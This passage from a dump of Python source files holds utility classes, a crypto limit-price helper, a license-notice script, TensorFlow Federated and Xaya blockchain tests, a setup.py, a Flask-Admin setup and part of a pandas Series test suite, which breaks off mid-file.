"1a2fbdc42aa0037a08ad5b5a9976d8cf322a2c7d", "content": "\nclass AlreadyBoundException(Exception):\n \"\"\"Raised when either x or y has been bound with the other.\"\"\"\n\n def __init__(self, *args):\n Exception.__init__(self, 'Already Bound', *args)\n\n# Bijection Mapper\nclass BiMapper():\n def __init__(self):\n self.x2y = {}\n self.y2x = {}\n\n def bind(self, x, y):\n \"\"\"\n Raises\n ------\n AlreadyBoundException:\n Raises AlreadyBoundException if x and y have been already bound.\n \"\"\"\n \n if x in self.x2y or y in self.y2x:\n raise AlreadyBoundException()\n \n self.x2y[x] = y\n self.y2x[y] = x\n\n def unbind_x(self, x):\n if not x in self.x2y: return\n\n y = self.x2y.pop(x)\n self.y2x.pop(y)\n\n def unbind_y(self, y):\n if not y in self.y2x: return\n\n x = self.y2x.pop(y)\n self.x2y.pop(x)\n"} {"ext": "py", "sha": "1a2fbe136ea46d2b8933a72cc64d2ad3d78dd0e4", "content": "from decimal import Decimal\n\nfrom . 
import exchanges\nfrom .user import User\nfrom .utils import log\n\n# TODO this logic isn't scientific in any way, mostly a playground\n\n\ndef determine_limit_price(user: User, symbol: str, purchasing_currency: str) -> Decimal:\n # TODO this is binance-specific right now, refactor this out\n\n trading_pair = symbol + purchasing_currency\n\n client = user.binance_client()\n\n # order depth returns the lowest asks and the highest bids\n # increasing limits returns lower bids and higher asks\n # grab a long-ish order book to get some analytics on the order book\n\n order_book = client.get_order_book(symbol=trading_pair, limit=100)\n\n # price that binance reports is at the bottom of the order book\n # looks like they use the bottom of the ask stack to clear market orders (makes sense)\n # cannot determine if the orders in the book are market, limit, or other order types.\n # I wonder if other exchanges expose that sort of information?\n lowest_ask = order_book[\"asks\"][0][0]\n highest_bid = order_book[\"bids\"][0][0]\n\n ask_difference = Decimal(highest_bid) - Decimal(lowest_ask)\n\n # TODO can we inspect the low price and determine the volume that was traded at that price point?\n last_day_low = low_over_last_day(user, trading_pair)\n\n log.warn(\n \"price analytics\",\n symbol=trading_pair,\n ask_bid_difference=ask_difference,\n ask_bid_percentage_difference=ask_difference / Decimal(lowest_ask) * -100,\n last_day_low_difference=100 - (last_day_low / Decimal(lowest_ask) * 100),\n bid=highest_bid,\n ask=lowest_ask,\n last_day_low=last_day_low,\n reported_price=exchanges.binance_price_for_symbol(trading_pair),\n )\n\n # TODO calculate momentum, or low price over last 24hrs, to determine the ideal drop price\n # TODO pull percentage drop attempt from user model\n\n limit_price = min(Decimal(highest_bid), Decimal(lowest_ask) * Decimal(0.97))\n limit_price = min(last_day_low, limit_price)\n\n # TODO can we inspect the order book depth here? 
Or general liquidity for the market?\n # what else can we do to improve our purchase strategy?\n\n # TODO add option to use the midpoint, or some other position, of the order book instead of the lowest ask\n\n return limit_price\n\n\ndef low_over_last_day(user: User, trading_pair: str) -> Decimal:\n # import datetime\n\n # TODO coinbase option is below, but ran into some issues with it that I can't remember\n # candles = coinbase_public_client.get_product_historic_rates(\n # product_id=\"PAXG-USD\",\n # granularity=60*60,\n # start=(datetime.datetime.now() - datetime.timedelta(hours=24)).isoformat(),\n # stop=datetime.datetime.now().isoformat()\n # )\n # min([candle['low'] for candle in candles])\n # https://binance-docs.github.io/apidocs/spot/en/#kline-candlestick-data\n # the API just returns an ordered array, which is insane\n\n \"\"\"\n [\n 1499040000000, // Open time\n \"0.01634790\", // Open\n \"0.80000000\", // High\n \"0.01575800\", // Low\n \"0.01577100\", // Close\n \"148976.11427815\", // Volume\n 1499644799999, // Close time\n \"2434.19055334\", // Quote asset volume\n 308, // Number of trades\n \"1756.87402397\", // Taker buy base asset volume\n \"28.46694368\", // Taker buy quote asset volume\n \"17928899.62484339\" // Ignore.\n ]\n \"\"\"\n\n candles = user.binance_client().get_klines(symbol=trading_pair, interval=\"1h\")\n\n return Decimal(min([candle[3] for candle in candles]))\n"} {"ext": "py", "sha": "1a2fc15b74332b0e1ff63e13e6914abfc9334f42", "content": "# Copyright (c) 2017 The Verde Developers.\n# Distributed under the terms of the BSD 3-Clause License.\n# SPDX-License-Identifier: BSD-3-Clause\n#\n# This code is part of the Fatiando a Terra project (https://www.fatiando.org)\n#\n\"\"\"\nAdd license notice to every source file if not present\n\"\"\"\nimport sys\nfrom argparse import ArgumentParser\nfrom pathlib import Path\n\nfrom pathspec import PathSpec\n\nPROJECT = \"verde\"\nYEAR = \"2017\"\nNOTICE = f\"\"\"\n# Copyright (c) {YEAR} The {PROJECT.title()} Developers.\n# Distributed under the terms of the BSD 3-Clause License.\n# SPDX-License-Identifier: BSD-3-Clause\n#\n# This code is part of the Fatiando a Terra project (https://www.fatiando.org)\n#\n\"\"\".strip()\nCHECK_HELP = \"\"\"\nDon't write the files, just return the status. Return code 0 means\nnothing would change. 
Return code 1 means some files lacks the license notice.\n\"\"\"\n\n\ndef get_gitignore(root):\n \"\"\"\n Return a PathSpec matching gitignore content if present.\n\n This function is a modified version of the one present in Black\n (https://github.com/psf/black) available under MIT License.\n \"\"\"\n gitignore = root / \".gitignore\"\n lines = []\n if gitignore.is_file():\n with gitignore.open() as gi_file:\n lines = gi_file.readlines()\n return PathSpec.from_lines(\"gitwildmatch\", lines)\n\n\ndef main():\n \"\"\"\n Add license notice to every source file if not present or just check\n \"\"\"\n # Create option parser\n parser = ArgumentParser(\n description=\" Add license notice to every source file if not present.\"\n )\n parser.add_argument(\n \"--check\", action=\"store_true\", dest=\"check\", default=False, help=CHECK_HELP\n )\n args = parser.parse_args()\n\n gitignore = get_gitignore(Path(\".\"))\n\n python_files = [\n path\n for path in Path(\".\").glob(\"**/*.py\")\n if not str(path).startswith(\".\")\n if not gitignore.match_file(path)\n ]\n\n missing_notice_files = []\n for pyfile in python_files:\n code = pyfile.read_text()\n if not code.startswith(NOTICE):\n missing_notice_files.append(pyfile)\n\n if args.check:\n if missing_notice_files:\n print(\"License notice is missing in some source files! 💔\")\n for pyfile in missing_notice_files:\n print(f\" {pyfile}\")\n sys.exit(1)\n else:\n print(\"All source files have the license notice! 🎉\")\n sys.exit(0)\n else:\n print(\"Successfully added license notice to:\")\n for pyfile in missing_notice_files:\n code = pyfile.read_text()\n pyfile.write_text(\"\\n\".join([NOTICE, code]))\n print(f\" {pyfile}\")\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a2fc40ddc164c90b62b6dc082080f9f5f1fd070", "content": "# Copyright 2019, The TensorFlow Federated Authors. 
#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport collections\n\nimport tensorflow as tf\nimport tensorflow_federated as tff\n\nfrom tensorflow_federated.python.research.utils import aggregate_fns\n\n\ndef create_weights_delta(input_size=2, hidden_size=5, constant=0):\n \"\"\"Returns deterministic weights delta for a linear model.\"\"\"\n kernel = constant + tf.reshape(\n tf.range(input_size * hidden_size, dtype=tf.float32),\n [input_size, hidden_size])\n bias = constant + tf.range(hidden_size, dtype=tf.float32)\n return collections.OrderedDict([('dense/kernel', kernel),\n ('dense/bias', bias)])\n\n\nclass ClipNormAggregateFnTest(tf.test.TestCase):\n\n def global_norm(self, value):\n return tf.linalg.global_norm(tf.nest.flatten(value))\n\n def test_clip_by_global_norm(self):\n clip_norm = 20.0\n aggregate_fn = aggregate_fns.build_clip_norm_aggregate_fn(clip_norm)\n # Global l2 norms [17.74824, 53.99074].\n deltas = [create_weights_delta(), create_weights_delta(constant=10)]\n deltas_type = tff.framework.type_from_tensors(deltas[0])\n weights = [1., 1.]\n\n @tff.federated_computation(\n tff.FederatedType(deltas_type, tff.CLIENTS),\n tff.FederatedType(tf.float32, tff.CLIENTS))\n def federated_aggregate_test(deltas, weights):\n state = tff.federated_value(aggregate_fn.initialize(), tff.SERVER)\n return aggregate_fn(state, deltas, weights)\n\n federated_aggregate_test.type_signature.result.check_equivalent_to(\n tff.StructType((\n tff.FederatedType(\n aggregate_fns.ClipNormAggregateState(\n clip_norm=tf.float32, max_norm=tf.float32), tff.SERVER),\n tff.FederatedType(deltas_type, tff.SERVER),\n )))\n\n state, mean = federated_aggregate_test(deltas, weights)\n\n expected_clipped = []\n for delta in deltas:\n flat = tf.nest.flatten(delta)\n clipped, _ = tf.clip_by_global_norm(flat, clip_norm)\n expected_clipped.append(tf.nest.pack_sequence_as(delta, clipped))\n expected_mean = tf.nest.map_structure(lambda a, b: (a + b) / 2,\n *expected_clipped)\n self.assertEqual(state.clip_norm, tf.constant(20.0, tf.float32))\n self.assertEqual(state.max_norm, tf.constant(53.99074, tf.float32))\n tf.nest.map_structure(self.assertAllEqual, expected_mean, mean)\n\n\nclass FixedClipNormProcessTest(tf.test.TestCase):\n\n def test_clip_by_global_norm(self):\n clip_norm = 20.0\n test_deltas = [create_weights_delta(), create_weights_delta(constant=10)]\n update_type = tff.framework.type_from_tensors(test_deltas[0])\n aggregate_fn = aggregate_fns.build_fixed_clip_norm_mean_process(\n clip_norm=clip_norm, model_update_type=update_type)\n\n self.assertEqual(\n aggregate_fn.next.type_signature,\n tff.FunctionType(\n parameter=(\n tff.FederatedType((), tff.SERVER),\n tff.FederatedType(update_type, tff.CLIENTS),\n tff.FederatedType(tf.float32, tff.CLIENTS),\n ),\n result=collections.OrderedDict(\n state=tff.FederatedType((), tff.SERVER),\n result=tff.FederatedType(update_type, tff.SERVER),\n measurements=tff.FederatedType(\n aggregate_fns.NormClippedAggregationMetrics(\n max_global_norm=tf.float32, 
num_clipped=tf.int32),\n tff.SERVER)),\n ))\n\n state = aggregate_fn.initialize()\n weights = [1., 1.]\n output = aggregate_fn.next(state, test_deltas, weights)\n\n expected_clipped = []\n for delta in test_deltas:\n clipped, _ = tf.clip_by_global_norm(tf.nest.flatten(delta), clip_norm)\n expected_clipped.append(tf.nest.pack_sequence_as(delta, clipped))\n expected_mean = tf.nest.map_structure(lambda a, b: (a + b) / 2,\n *expected_clipped)\n self.assertAllClose(expected_mean, output['result'])\n\n # Global l2 norms [17.74824, 53.99074].\n metrics = output['measurements']\n self.assertAlmostEqual(metrics.max_global_norm, 53.99074, places=5)\n self.assertEqual(metrics.num_clipped, 1)\n\n\nif __name__ == '__main__':\n tf.test.main()\n"} {"ext": "py", "sha": "1a2fc42564e0d25ea3508aa3521acc4641688c8b", "content": "#!/usr/bin/env python3\n# Copyright (c) 2018-2021 The Xaya developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\"\"\"Test spendability of premine and that P2SH is enforced correctly for it.\"\"\"\n\nfrom test_framework.test_framework import BitcoinTestFramework\nfrom test_framework.messages import *\nfrom test_framework.util import *\n\nimport codecs\n\nPREMINE_VALUE = Decimal ('222222222')\nPREMINE_ADDRESS = 'dHNvNaqcD7XPDnoRjAoyfcMpHRi5upJD7p'\nPREMINE_PRIVKEYS = ['b69iyynFSWcU54LqXisbbqZ8uTJ7Dawk3V3yhht6ykxgttqMQFjb',\n 'b3fgAKVQpMj24gbuh6DiXVwCCjCbo1cWiZC2fXgWEU9nXy6sdxD5']\nPREMINE_PUBKEYS = [\n '03c278d06b977e67b8ea45ef24e3c96a9258c47bc4cce3d0b497b690d672497b6e',\n '0221ac9dc97fe12a98374344d08b458a9c2c1df9afb29dd6089b94a3b4dc9ad570',\n]\n\nclass PremineTest(BitcoinTestFramework):\n def set_test_params(self):\n self.setup_clean_chain = True\n self.num_nodes = 1\n\n def skip_test_if_missing_module (self):\n self.skip_if_no_wallet ()\n\n def run_test(self):\n node = self.nodes[0]\n node.importaddress (PREMINE_ADDRESS)\n\n # Find basic data about the genesis coinbase tx.\n genesis = node.getblock (node.getblockhash (0), 2)\n assert_equal (len (genesis['tx']), 1)\n tx = genesis['tx'][0]\n txid = tx['hash']\n assert_equal (len (tx['vout']), 1)\n out = tx['vout'][0]\n assert_equal (out['value'], PREMINE_VALUE)\n assert_equal (out['scriptPubKey']['address'], PREMINE_ADDRESS)\n\n # Accessing it should work normally (upstream Bitcoin/Namecoin have a\n # special check that disallows the genesis coinbase with getrawtransaction,\n # as it is not spendable).\n node.gettransaction (txid)\n assert_equal (node.getrawtransaction (txid, False, genesis['hash']),\n tx['hex'])\n\n # The coinbase txout should be in the UTXO set.\n utxo = node.gettxout (txid, 0)\n assert utxo is not None\n\n # Check balance of node and then import the keys for the premine\n # and check again. 
It should be available as spendable.\n assert_equal (node.getbalance (), 0)\n for key in PREMINE_PRIVKEYS:\n node.importprivkey (key, 'premine') \n pubkeys = []\n for addr in node.getaddressesbylabel ('premine'):\n data = node.getaddressinfo (addr)\n if (not data['isscript']) and (not data['iswitness']):\n pubkeys.append (data['pubkey'])\n assert_equal (set (pubkeys), set (PREMINE_PUBKEYS))\n p2sh = node.addmultisigaddress (1, PREMINE_PUBKEYS)\n assert_equal (p2sh['address'], PREMINE_ADDRESS)\n node.rescanblockchain ()\n assert_equal (node.getbalance (), PREMINE_VALUE)\n\n # Construct a raw tx spending the premine.\n addr = node.getnewaddress ()\n inputs = [{\"txid\": txid, \"vout\": 0}]\n outputs = {addr: Decimal ('123456')}\n rawTx = node.createrawtransaction (inputs, outputs)\n\n # Try to \"sign\" it by just adding the redeem script, which would have been\n # valid before the P2SH softfork. Doing so should fail, which verifies that\n # P2SH is enforced right from the start and thus that the premine is safe.\n data = node.getaddressinfo (PREMINE_ADDRESS)\n redeemScript = data['hex']\n # Prepend script size, so that it will correctly push the script hash\n # to the stack.\n redeemScript = (\"%02x\" % (len (redeemScript) // 2)) + redeemScript\n forgedTx = tx_from_hex (rawTx)\n forgedTx.vin[0].scriptSig = codecs.decode (redeemScript, 'hex_codec')\n forgedTx = forgedTx.serialize ().hex ()\n assert_raises_rpc_error (-26, \"not valid\",\n node.sendrawtransaction, forgedTx, 0)\n\n # Sign and send the raw tx, should succeed.\n signed = node.signrawtransactionwithwallet (rawTx)\n assert signed['complete']\n signedTx = signed['hex']\n sendId = node.sendrawtransaction (signedTx, 0)\n node.generate (1)\n assert_equal (node.gettransaction (sendId)['confirmations'], 1)\n\nif __name__ == '__main__':\n PremineTest().main()\n"} {"ext": "py", "sha": "1a2fc4c1e27cfa944455dd9e15fa7f96ace3d7d8", "content": "from re import search\nfrom setuptools import setup, find_packages\n\nwith open(\"graphql/__init__.py\") as init_file:\n version = search('__version__ = \"(.*)\"', init_file.read()).group(1)\n\nwith open(\"README.md\") as readme_file:\n readme = readme_file.read()\n\nsetup(\n name=\"GraphQL-core-next\",\n version=version,\n description=\"GraphQL-core-next is a Python port of GraphQL.js,\"\n \" the JavaScript reference implementation for GraphQL.\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n keywords=\"graphql\",\n url=\"https://github.com/graphql-python/graphql-core-next\",\n author=\"Christoph Zwerschke\",\n author_email=\"cito@online.de\",\n license=\"MIT license\",\n # PEP-561: https://www.python.org/dev/peps/pep-0561/\n package_data={\"graphql\": [\"py.typed\"]},\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n ],\n install_requires=[],\n python_requires=\">=3.6\",\n test_suite=\"tests\",\n tests_require=[\n \"pytest\",\n \"pytest-asyncio\",\n \"pytest-cov\",\n \"pytest-describe\",\n \"black\",\n \"flake8\",\n \"mypy\",\n \"tox\",\n \"python-coveralls\",\n ],\n packages=find_packages(include=[\"graphql\"]),\n include_package_data=True,\n zip_safe=False,\n)\n"} {"ext": "py", "sha": "1a2fc4e313fbc3ebe872bc603357771bf264967c", "content": "'''\nFlask-Admin has issues when used with Application Factory pattern.\nSince I had issues when 
using it with pytest, I had to move the admin\ninstance to \"register_admin\" method.\n\nhttps://github.com/flask-admin/flask-admin/issues/910\n'''\nfrom flask import redirect, url_for, request\nfrom flask_admin import Admin\nfrom flask_admin.menu import MenuLink\nfrom flask_admin.contrib.sqla import ModelView\nfrom flask_login import current_user\n\nfrom app.extensions import db\nfrom app.auth.models import User, Role, PreAllowedUser\nfrom app.main.models import (\n Product, Specification, StockProduct, Stock, Order, OrderItem, Transaction)\n\n\nclass ProtectedModelView(ModelView):\n column_display_pk = True\n def is_accessible(self):\n return (current_user.is_authenticated and\n current_user.is_administrator())\n\n def inaccessible_callback(self, name, **kwargs):\n return redirect(url_for('auth.login', next=request.url))\n\n\ndef register_admin(app):\n admin = Admin(app=app, template_mode='bootstrap3')\n admin.add_link(MenuLink(name='Voltar', url=('/')))\n admin.add_views(\n ProtectedModelView(User, db.session),\n ProtectedModelView(Role, db.session),\n ProtectedModelView(PreAllowedUser, db.session),\n ProtectedModelView(Product, db.session),\n ProtectedModelView(Specification, db.session),\n ProtectedModelView(StockProduct, db.session),\n ProtectedModelView(Stock, db.session),\n ProtectedModelView(Order, db.session),\n ProtectedModelView(OrderItem, db.session),\n ProtectedModelView(Transaction, db.session),\n )\n"} {"ext": "py", "sha": "1a2fc5a8fc13c30248bcafa6f23e14668fd26734", "content": "# coding=utf-8\n# pylint: disable-msg=E1101,W0612\n\nimport sys\nfrom datetime import datetime, timedelta\nimport operator\nimport string\nfrom inspect import getargspec\nfrom itertools import product, starmap\nfrom distutils.version import LooseVersion\n\nimport nose\n\nfrom numpy import nan, inf\nimport numpy as np\nimport numpy.ma as ma\nimport pandas as pd\n\nfrom pandas import (Index, Series, DataFrame, isnull, notnull, bdate_range,\n date_range, period_range, timedelta_range)\nfrom pandas.core.index import MultiIndex\nfrom pandas.core.indexing import IndexingError\nfrom pandas.tseries.period import PeriodIndex\nfrom pandas.tseries.index import Timestamp, DatetimeIndex\nfrom pandas.tseries.tdi import Timedelta, TimedeltaIndex\nimport pandas.core.common as com\nimport pandas.core.config as cf\nimport pandas.lib as lib\n\nimport pandas.core.datetools as datetools\nimport pandas.core.nanops as nanops\n\nfrom pandas.compat import StringIO, lrange, range, zip, u, OrderedDict, long\nfrom pandas import compat\nfrom pandas.util.testing import (assert_series_equal,\n assert_almost_equal,\n assert_frame_equal,\n ensure_clean)\nimport pandas.util.testing as tm\n\n\n#------------------------------------------------------------------------------\n# Series test cases\n\nJOIN_TYPES = ['inner', 'outer', 'left', 'right']\n\n\nclass CheckNameIntegration(object):\n\n _multiprocess_can_split_ = True\n\n def test_scalarop_preserve_name(self):\n result = self.ts * 2\n self.assertEqual(result.name, self.ts.name)\n\n def test_copy_name(self):\n result = self.ts.copy()\n self.assertEqual(result.name, self.ts.name)\n\n def test_copy_index_name_checking(self):\n # don't want to be able to modify the index stored elsewhere after\n # making a copy\n\n self.ts.index.name = None\n self.assertIsNone(self.ts.index.name)\n self.assertIs(self.ts, self.ts)\n\n cp = self.ts.copy()\n cp.index.name = 'foo'\n com.pprint_thing(self.ts.index.name)\n self.assertIsNone(self.ts.index.name)\n\n def test_append_preserve_name(self):\n result 
= self.ts[:5].append(self.ts[5:])\n self.assertEqual(result.name, self.ts.name)\n\n def test_dt_namespace_accessor(self):\n\n # GH 7207\n # test .dt namespace accessor\n\n ok_for_base = ['year','month','day','hour','minute','second','weekofyear','week','dayofweek','weekday','dayofyear','quarter','freq']\n ok_for_period = ok_for_base + ['qyear']\n ok_for_dt = ok_for_base + ['date','time','microsecond','nanosecond', 'is_month_start', 'is_month_end', 'is_quarter_start',\n 'is_quarter_end', 'is_year_start', 'is_year_end', 'tz']\n ok_for_dt_methods = ['to_period','to_pydatetime','tz_localize','tz_convert']\n ok_for_td = ['days','seconds','microseconds','nanoseconds']\n ok_for_td_methods = ['components','to_pytimedelta']\n\n def get_expected(s, name):\n result = getattr(Index(s.values),prop)\n if isinstance(result, np.ndarray):\n if com.is_integer_dtype(result):\n result = result.astype('int64')\n elif not com.is_list_like(result):\n return result\n return Series(result,index=s.index)\n\n def compare(s, name):\n a = getattr(s.dt,prop)\n b = get_expected(s,prop)\n if not (com.is_list_like(a) and com.is_list_like(b)):\n self.assertEqual(a,b)\n else:\n tm.assert_series_equal(a,b)\n\n # invalids\n for s in [Series(np.arange(5)),\n Series(list('abcde')),\n Series(np.random.randn(5))]:\n self.assertRaises(TypeError, lambda : s.dt)\n\n # datetimeindex\n for s in [Series(date_range('20130101',periods=5)),\n Series(date_range('20130101',periods=5,freq='s')),\n Series(date_range('20130101 00:00:00',periods=5,freq='ms'))]:\n for prop in ok_for_dt:\n\n # we test freq below\n if prop != 'freq':\n compare(s, prop)\n\n for prop in ok_for_dt_methods:\n getattr(s.dt,prop)\n\n result = s.dt.to_pydatetime()\n self.assertIsInstance(result,np.ndarray)\n self.assertTrue(result.dtype == object)\n\n result = s.dt.tz_localize('US/Eastern')\n expected = Series(DatetimeIndex(s.values).tz_localize('US/Eastern'),index=s.index)\n tm.assert_series_equal(result, expected)\n\n tz_result = result.dt.tz\n self.assertEqual(str(tz_result), 'US/Eastern')\n freq_result = s.dt.freq\n self.assertEqual(freq_result, DatetimeIndex(s.values, freq='infer').freq)\n\n # let's localize, then convert\n result = s.dt.tz_localize('UTC').dt.tz_convert('US/Eastern')\n expected = Series(DatetimeIndex(s.values).tz_localize('UTC').tz_convert('US/Eastern'),index=s.index)\n tm.assert_series_equal(result, expected)\n\n # timedeltaindex\n for s in [Series(timedelta_range('1 day',periods=5),index=list('abcde')),\n Series(timedelta_range('1 day 01:23:45',periods=5,freq='s')),\n Series(timedelta_range('2 days 01:23:45.012345',periods=5,freq='ms'))]:\n for prop in ok_for_td:\n\n # we test freq below\n if prop != 'freq':\n compare(s, prop)\n\n for prop in ok_for_td_methods:\n getattr(s.dt,prop)\n\n result = s.dt.components\n self.assertIsInstance(result,DataFrame)\n tm.assert_index_equal(result.index,s.index)\n\n result = s.dt.to_pytimedelta()\n self.assertIsInstance(result,np.ndarray)\n self.assertTrue(result.dtype == object)\n\n freq_result = s.dt.freq\n self.assertEqual(freq_result, TimedeltaIndex(s.values, freq='infer').freq)\n\n # both\n index = date_range('20130101',periods=3,freq='D')\n s = Series(date_range('20140204',periods=3,freq='s'),index=index)\n tm.assert_series_equal(s.dt.year,Series(np.array([2014,2014,2014],dtype='int64'),index=index))\n tm.assert_series_equal(s.dt.month,Series(np.array([2,2,2],dtype='int64'),index=index))\n tm.assert_series_equal(s.dt.second,Series(np.array([0,1,2],dtype='int64'),index=index))\n\n # periodindex\n for s in 
[Series(period_range('20130101',periods=5,freq='D'))]:\n\n for prop in ok_for_period:\n\n # we test freq below\n if prop != 'freq':\n compare(s, prop)\n\n freq_result = s.dt.freq\n self.assertEqual(freq_result, PeriodIndex(s.values).freq)\n\n # test limited display api\n def get_dir(s):\n results = [ r for r in s.dt.__dir__() if not r.startswith('_') ]\n return list(sorted(set(results)))\n\n s = Series(date_range('20130101',periods=5,freq='D'))\n results = get_dir(s)\n tm.assert_almost_equal(results,list(sorted(set(ok_for_dt + ok_for_dt_methods))))\n\n s = Series(period_range('20130101',periods=5,freq='D').asobject)\n results = get_dir(s)\n tm.assert_almost_equal(results,list(sorted(set(ok_for_period))))\n\n # no setting allowed\n s = Series(date_range('20130101',periods=5,freq='D'))\n with tm.assertRaisesRegexp(ValueError, \"modifications\"):\n s.dt.hour = 5\n\n # trying to set a copy\n with pd.option_context('chained_assignment','raise'):\n def f():\n s.dt.hour[0] = 5\n self.assertRaises(com.SettingWithCopyError, f)\n\n def test_valid_dt_with_missing_values(self):\n\n from datetime import date, time\n\n # GH 8689\n s = Series(date_range('20130101',periods=5,freq='D'))\n s_orig = s.copy()\n s.iloc[2] = pd.NaT\n\n for attr in ['microsecond','nanosecond','second','minute','hour','day']:\n expected = getattr(s.dt,attr).copy()\n expected.iloc[2] = np.nan\n result = getattr(s.dt,attr)\n tm.assert_series_equal(result, expected)\n\n result = s.dt.date\n expected = Series([date(2013,1,1),date(2013,1,2),np.nan,date(2013,1,4),date(2013,1,5)],dtype='object')\n tm.assert_series_equal(result, expected)\n\n result = s.dt.time\n expected = Series([time(0),time(0),np.nan,time(0),time(0)],dtype='object')\n tm.assert_series_equal(result, expected)\n\n def test_dt_accessor_api(self):\n # GH 9322\n from pandas.tseries.common import (CombinedDatetimelikeProperties,\n DatetimeProperties)\n self.assertIs(Series.dt, CombinedDatetimelikeProperties)\n\n s = Series(date_range('2000-01-01', periods=3))\n self.assertIsInstance(s.dt, DatetimeProperties)\n\n with tm.assertRaisesRegexp(TypeError, \"only use .dt accessor\"):\n Series([1]).dt\n\n def test_binop_maybe_preserve_name(self):\n\n # names match, preserve\n result = self.ts * self.ts\n self.assertEqual(result.name, self.ts.name)\n\n result = self.ts * self.ts[:-2]\n self.assertEqual(result.name, self.ts.name)\n\n # names don't match, don't preserve\n cp = self.ts.copy()\n cp.name = 'something else'\n result = self.ts + cp\n self.assertIsNone(result.name)\n\n def test_combine_first_name(self):\n result = self.ts.combine_first(self.ts[:5])\n self.assertEqual(result.name, self.ts.name)\n\n def test_combine_first_dt64(self):\n from pandas.tseries.tools import to_datetime\n s0 = to_datetime(Series([\"2010\", np.NaN]))\n s1 = to_datetime(Series([np.NaN, \"2011\"]))\n rs = s0.combine_first(s1)\n xp = to_datetime(Series(['2010', '2011']))\n assert_series_equal(rs, xp)\n\n s0 = to_datetime(Series([\"2010\", np.NaN]))\n s1 = Series([np.NaN, \"2011\"])\n rs = s0.combine_first(s1)\n xp = Series([datetime(2010, 1, 1), '2011'])\n assert_series_equal(rs, xp)\n\n def test_get(self):\n\n # GH 6383\n s = Series(np.array([43, 48, 60, 48, 50, 51, 50, 45, 57, 48, 56,\n 45, 51, 39, 55, 43, 54, 52, 51, 54]))\n\n result = s.get(25, 0)\n expected = 0\n self.assertEqual(result,expected)\n\n s = Series(np.array([43, 48, 60, 48, 50, 51, 50, 45, 57, 48, 56,\n 45, 51, 39, 55, 43, 54, 52, 51, 54]),\n index=pd.Float64Index([25.0, 36.0, 49.0, 64.0, 81.0, 100.0,\n 121.0, 144.0, 169.0, 196.0, 
1225.0,\n 1296.0, 1369.0, 1444.0, 1521.0, 1600.0,\n 1681.0, 1764.0, 1849.0, 1936.0],\n dtype='object'))\n\n result = s.get(25, 0)\n expected = 43\n self.assertEqual(result,expected)\n\n # GH 7407\n # with a boolean accessor\n df = pd.DataFrame({'i':[0]*3, 'b':[False]*3})\n vc = df.i.value_counts()\n result = vc.get(99,default='Missing')\n self.assertEqual(result,'Missing')\n\n vc = df.b.value_counts()\n result = vc.get(False,default='Missing')\n self.assertEqual(result,3)\n\n result = vc.get(True,default='Missing')\n self.assertEqual(result,'Missing')\n\n def test_delitem(self):\n\n # GH 5542\n # should delete the item inplace\n s = Series(lrange(5))\n del s[0]\n\n expected = Series(lrange(1,5),index=lrange(1,5))\n assert_series_equal(s, expected)\n\n del s[1]\n expected = Series(lrange(2,5),index=lrange(2,5))\n assert_series_equal(s, expected)\n\n # empty\n s = Series()\n def f():\n del s[0]\n self.assertRaises(KeyError, f)\n\n # only 1 left, del, add, del\n s = Series(1)\n del s[0]\n assert_series_equal(s, Series(dtype='int64'))\n s[0] = 1\n assert_series_equal(s, Series(1))\n del s[0]\n assert_series_equal(s, Series(dtype='int64'))\n\n def test_getitem_preserve_name(self):\n result = self.ts[self.ts > 0]\n self.assertEqual(result.name, self.ts.name)\n\n result = self.ts[[0, 2, 4]]\n self.assertEqual(result.name, self.ts.name)\n\n result = self.ts[5:10]\n self.assertEqual(result.name, self.ts.name)\n\n def test_getitem_setitem_ellipsis(self):\n s = Series(np.random.randn(10))\n\n np.fix(s)\n\n result = s[...]\n assert_series_equal(result, s)\n\n s[...] = 5\n self.assertTrue((result == 5).all())\n\n def test_getitem_negative_out_of_bounds(self):\n s = Series(tm.rands_array(5, 10), index=tm.rands_array(10, 10))\n\n self.assertRaises(IndexError, s.__getitem__, -11)\n self.assertRaises(IndexError, s.__setitem__, -11, 'foo')\n\n def test_multilevel_name_print(self):\n index = MultiIndex(levels=[['foo', 'bar', 'baz', 'qux'],\n ['one', 'two', 'three']],\n labels=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3],\n [0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],\n names=['first', 'second'])\n s = Series(lrange(0, len(index)), index=index, name='sth')\n expected = [\"first second\",\n \"foo one 0\",\n \" two 1\",\n \" three 2\",\n \"bar one 3\",\n \" two 4\",\n \"baz two 5\",\n \" three 6\",\n \"qux one 7\",\n \" two 8\",\n \" three 9\",\n \"Name: sth, dtype: int64\"]\n expected = \"\\n\".join(expected)\n self.assertEqual(repr(s), expected)\n\n def test_multilevel_preserve_name(self):\n index = MultiIndex(levels=[['foo', 'bar', 'baz', 'qux'],\n ['one', 'two', 'three']],\n labels=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3],\n [0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],\n names=['first', 'second'])\n s = Series(np.random.randn(len(index)), index=index, name='sth')\n\n result = s['foo']\n result2 = s.ix['foo']\n self.assertEqual(result.name, s.name)\n self.assertEqual(result2.name, s.name)\n\n def test_name_printing(self):\n # test small series\n s = Series([0, 1, 2])\n s.name = \"test\"\n self.assertIn(\"Name: test\", repr(s))\n s.name = None\n self.assertNotIn(\"Name:\", repr(s))\n # test big series (diff code path)\n s = Series(lrange(0, 1000))\n s.name = \"test\"\n self.assertIn(\"Name: test\", repr(s))\n s.name = None\n self.assertNotIn(\"Name:\", repr(s))\n\n s = Series(index=date_range('20010101', '20020101'), name='test')\n self.assertIn(\"Name: test\", repr(s))\n\n def test_pickle_preserve_name(self):\n unpickled = 